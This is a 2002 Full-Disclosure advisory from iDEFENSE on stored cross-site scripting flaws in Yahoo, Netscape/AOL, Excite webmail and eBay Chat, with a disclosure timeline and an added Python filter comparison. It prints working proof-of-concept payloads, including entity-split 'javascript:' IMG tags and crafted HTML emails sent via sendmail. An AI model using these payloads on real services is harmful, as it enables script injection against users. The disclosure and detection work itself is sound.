[Full-Disclosure] iDEFENSE Security Advisory: Cross-Site Scripting Vulnerabilities in Popular Web Applications

From: David Endler (dendlerat_private)
Date: Mon Aug 19 2002 - 05:39:49 PDT


    iDEFENSE Security Advisory 08.19.2002
    Cross-Site Scripting (XSS) Vulnerabilities in Popular Web Applications
    
    Yahoo Mail	http://mail.yahoo.com
    Netscape Mail	http://webmail.netscape.com
    AOL Webmail	http://webmail.aol.com (same as Netscape Mail)
    Excite Mail	http://mail.excite.com
    eBay Chat 	http://pages.ebay.com/community/chat/index.html
    
    
    DESCRIPTION 
    
    Many Web Applications generate dynamic HTML web pages using 
    user-submitted data and other sources of "untrusted content." 
    Web Applications that do not meticulously filter this untrusted 
    content before presenting the web page to the user may allow 
    the web page, and the way a web browser interprets its content, 
    to be manipulated.
    
    This issue becomes dangerous when untrusted content can be 
    inserted into a dynamic HTML web page via a web application 
    or other means, causing potentially malicious code to execute 
    within a user's browser with exactly the same privileges as 
    content from the legitimate web server.
    
    Some Web Applications, such as Yahoo Mail, already 
    meticulously filter incoming untrusted data before the content 
    reaches their users. However, given the loose interpretation 
    of HTML/JavaScript/VBScript etc. by various web browsers, 
    obfuscated content may elude the current filters and execute 
    within the user's browser environment.
    
    This allows an attacker to target users almost instantly without 
    relying on the user performing any activity other than 
    normal usage. All vulnerabilities affect either Microsoft 
    Internet Explorer or Netscape or both. These types of 
    XSS vulnerabilities are usually classified as "constant-state", 
    as they exist persistently for more than just one HTTP 
    request. More detailed XSS exploitation scenarios 
    are described in an iDEFENSE paper available at 
    http://www.idefense.com/XSS.html.
    
    
    ANALYSIS
    
    *** Yahoo Mail ***
    
    The following XSS vulnerability only existed for Netscape 4.x 
    browsers (see Vendor Response; this issue in Yahoo has since 
    been addressed):
    
    bash$ sendmail -t targetat_private
    
    Paste the following email message
    --------------------------------------------------
    MIME-Version: 1.0
    From: Attack <attackerat_private>
    Content-Type: text/html; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    Subject: XSS Attack
    
    <HTML><BODY>
    
    <ILAYER SRC="script.js"></ILAYER>
    
    
    </BODY></HTML>
    .
    --------------------------------------------------
    
    
    
    *** Netscape/AOL Webmail ***
    
    This XSS vulnerability exists in Netscape Mail 
    (webmail.netscape.com) and AOL Webmail (webmail.aol.com).  The 
    following XSS behavior can be caused in both IE 5.x/6.x and 
    Netscape 4.x:
    
    bash$ sendmail -t targetat_private
    
    Paste the following email message
    --------------------------------------------------
    MIME-Version: 1.0
    From: Attack <attackerat_private>
    Content-Type: text/html; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    Subject: XSS Attack
    
    <HTML><BODY>
    
    <IMG SRC="javasc&#X0A;ript:alert('test');">
    
    </BODY></HTML>
    .
    --------------------------------------------------
    
    
    
    *** Excite Webmail ***
    
    It would seem that Excite does not perform any filtering of 
    HTML/SCRIPT whatsoever.  The following XSS behavior can be 
    caused in both IE 5.x/6.x and Netscape 4.x/6.x:
    
    bash$ sendmail -t targetat_private
    
    Paste the following email message
    --------------------------------------------------
    MIME-Version: 1.0
    From: Attack <attackerat_private>
    Content-Type: text/html; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    Subject: XSS Attack
    
    <HTML><BODY>
    
    <SCRIPT>alert(document.domain);</SCRIPT>
    
    </BODY></HTML>
    .
    --------------------------------------------------
    
    
    
    *** eBay Chat ***
    
    While you are logged in as an eBay user, place the text string 
    below within the chat text field and click submit. The message 
    will appear within the main chat text area and will execute 
    in a user's browser when read. The following XSS behavior can 
    be caused in both IE 5.x/6.x and Netscape 4.x:
    
    ---- XSS String ------------------------------------
    <IMG SRC="javasc&#X0A;ript:alert(document.domain);">
    ----------------------------------------------------
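The DESCRIPTION section notes that obfuscated content can slip past filters that look for literal markup, and the payloads above show the three shapes involved: an entity-split `javasc&#X0A;ript:` scheme in an IMG SRC, a Netscape ILAYER loading a script file, and a bare SCRIPT tag. The following added example (not part of the advisory, and not any vendor's filter code) contrasts a naive substring filter with one that inspects the parsed, entity-decoded markup the way a lax browser of that era would; the tag and scheme lists are assumptions chosen to cover the cases on this page.

```python
import re
from html.parser import HTMLParser

# Tags that run or load script directly: SCRIPT, plus the Netscape 4 layer
# tags used in the Yahoo Mail case. Assumed list, not the advisory's.
DANGEROUS_TAGS = {"script", "ilayer", "layer"}
SCRIPT_SCHEMES = {"javascript", "vbscript"}
# Whitespace and C0 control characters that lax browsers drop inside a scheme.
_CONTROL_RE = re.compile(r"[\x00-\x20]")

def url_scheme(value: str) -> str:
    """Scheme a lax browser would see: control chars removed, case folded."""
    compact = _CONTROL_RE.sub("", value)
    scheme, sep, _ = compact.partition(":")
    return scheme.lower() if sep else ""

class ScriptFinder(HTMLParser):
    """Collects the reasons a fragment would run script when rendered."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"tag:{tag}")
        # HTMLParser has already decoded entity refs such as &#X0A; in values,
        # so the embedded newline is visible here and url_scheme() removes it.
        for name, value in attrs:
            if name in ("src", "href") and value:
                scheme = url_scheme(value)
                if scheme in SCRIPT_SCHEMES:
                    self.findings.append(f"{name}:{scheme}")

def naive_filter(markup: str) -> bool:
    """Literal substring check of the kind the advisory says is evaded."""
    low = markup.lower()
    return "<script" in low or "javascript:" in low

def normalized_filter(markup: str) -> bool:
    """Parse first, then judge tags and decoded attribute values."""
    finder = ScriptFinder()
    finder.feed(markup)
    finder.close()
    return bool(finder.findings)

# Constructed samples: the three payload shapes from the advisory plus benign input.
SAMPLES = {
    "img_entity": '<IMG SRC="javasc&#X0A;ript:alert(document.domain);">',
    "ilayer": '<ILAYER SRC="script.js"></ILAYER>',
    "script": '<SCRIPT>alert(document.domain);</SCRIPT>',
    "benign": '<IMG SRC="http://example.com/logo.png">',
}

def audit(samples=SAMPLES) -> dict:
    """Map each sample name to (naive_verdict, normalized_verdict)."""
    return {k: (naive_filter(v), normalized_filter(v)) for k, v in samples.items()}
```

Only the SCRIPT-tag sample is caught by both filters; the entity-split IMG and the ILAYER pass the naive check and are flagged only after parsing, which is the gap the advisory describes.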
    
    
    
    DISCOVERY CREDIT
    
    Jeremiah Grossman (jeremiahat_private)
    Lex Arquette (lexat_private)
    
    
    VENDOR RESPONSE
    
    July 16, 2002 - Scott Renfro (scottr@yahoo-inc.com), title 
    "Paranoid Yahoo", responded and the issue was fixed.
    
    
    DISCLOSURE TIMELINE
    
    June 27, 2002		Exclusively Disclosed to iDEFENSE
    July 16, 2002		Ebay, AOL/Netscape, Yahoo, and Excite notified
    July 16, 2002		iDEFENSE Client Disclosure
    August 11, 2002		Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems
    August 19, 2002		Still no response from Excite, AOL/Netscape, or eBay - Public Disclosure
    
    
    
    
    http://www.idefense.com/contributor.html
    
    David Endler, CISSP
    Director, Technical Intelligence
    iDEFENSE, Inc.
    14151 Newbrook Drive
    Suite 100
    Chantilly, VA 20151
    voice: 703-344-2632
    fax: 703-961-1071
    
    dendlerat_private
    www.idefense.com
    
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    


